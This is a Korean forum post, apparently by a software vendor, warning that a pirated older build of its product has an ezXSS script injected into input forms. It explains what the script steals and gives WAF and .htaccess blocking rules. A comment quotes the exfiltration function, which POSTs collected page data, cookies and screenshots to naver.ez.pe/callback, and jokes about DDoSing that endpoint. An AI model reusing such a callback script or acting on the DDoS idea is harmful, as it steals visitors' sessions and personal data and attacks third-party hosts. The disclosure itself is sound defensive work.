테스트 사이트 - 개발 중인 베타 버전입니다

[주의] 최근 무단 배포된 파일 XSS공격 코드 확인

· 7개월 전 · 972 · 31

안녕하세요.

최근 무단 배포된 파일을 제보받아 금일 확인하였습니다.

 

소스코드 확인결과

보안 강화 (SQL Injection 취약점 개선, XSS 취약점 개선) 패치 이전의 버전 (1.0.2) 으로 추정되며

비 멤버십 회원이 구매 > 수정하여 무단 배포한 것으로 추측 됩니다.

 

아울러, 무단배포된 파일을 다운로드 하셔서 사용중이시라면

즉시 사용을 중단해주세요.

입력폼 등에 스크립트가 심어져 있는것을 확인하였습니다.

 

 

원본코드 (정상)

 

3537874058_1742184354.9111.png

 

 

무단배포된 코드 (naver 도메인으로 스크립트가 심어져 있습니다.)

 

3537874058_1742184363.8503.png

 

 

해당 스크립트는 ezXSS라는 XSS 탐지 도구 입니다.

공격자가 이를 활용하여 피싱, 세션 탈취, 키로깅, 크립토재킹 등의 공격을 수행할 수 있습니다.

 

1. 웹사이트 방문자의 세션 및 개인정보 유출

2. 관리자 계정이 공격당할 가능성 증가

3. 웹페이지 변조 또는 자동 리디렉션

 

@고돌스 님 께서 알려주셨습니다. (탈취되는 정보)

dom: "전체 HTML",
cookie: "세션 ID",
screenshot: "Base64 이미지 데이터",
user-agent: "브라우저 정보",

 

 

차단방법

 

* 해당 도메인(naver.ez.pe)을 웹 방화벽(WAF) 또는 보안 시스템에서 차단

* .htaccess 파일에 다음 코드를 추가하여 해당 스크립트 차단

 

<IfModule mod_rewrite.c>

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} naver.ez.pe [NC,OR]

    RewriteCond %{HTTP_USER_AGENT} ezXSS [NC]

    RewriteRule .* - [F,L]

</IfModule>

 

무단으로 배포되는 파일은 절대 사용하지 마시고,

사용하셨다면 즉각 폐기처리 해주세요.

댓글 작성

댓글을 작성하시려면 로그인이 필요합니다.

로그인하기

댓글 31개

7개월 전

@DawnDew 네네 ㅠ

7개월 전

여러모로 속 시끄럽고 고생 많으십니다 ㅠㅠ

7개월 전

@쪼각조각 네.. 주말동안 너무 분잡했네요...ㅠ

걱정해주셔서 감사합니다 ㅠ

7개월 전

// 데이터 전송 함수
function ez_cb(t, e) {
var n = new XMLHttpRequest();
n.open("POST", "https://naver.ez.pe/callback", true); n.setRequestHeader("Content-Type", "text/plain");
n.send(JSON.stringify(t)); <= 수집된 데이터 전송
}

이곳으로 대량의 디도스 공격을 보내버리는 방법도 있겠군요 ㅎㅎ
더미 데이터들 쫙 넣어서 ㅎㅎ

7개월 전

@똥싼너구리

그누에서 제이쿼리 안 쓰고

클래식 아작스를 사용하는 소스는 얼마만에 보는지 모르겠네요.

너구리님 사랑합니다.

근데 이렇게 무모한 짓을 왜 했을까요? 이 이슈의 흐름을 보면 대체 왜? 라는 생각이 절로 듭니다.

7개월 전

@Gothrock 네.. 저도 그렇네요...

손해를 보더라도 악성유저는 만들지말자는 모토로 운영을 하고있고..

틀어지거나 문제가 있었던 분도 안계시는데, 답답할 따름이네요..ㅎㅎ..

7개월 전

그야말로 계엄 상황이네요....하루 빨리 마무리되어 평안을 되찾으셨으면 합니다......

7개월 전

@감독님 네네 감사합니다 ㅠㅠ

7개월 전

최근에 올리신 글이 삭제되었군요.

모쪼록 정상화 되길 바래봅니다.

게시글 목록

번호 제목
1717629
1717626
1717625
1717621
1717619
1717611
1717610
1717609
1717607
1717601
1717598
1717591
1717590
1717583
1717575
1717572
1717568
1717566
1717549
1717545
1717533
1717512
1717511
1717508
1717495
1717479
1717473
1717470
1717463
1717452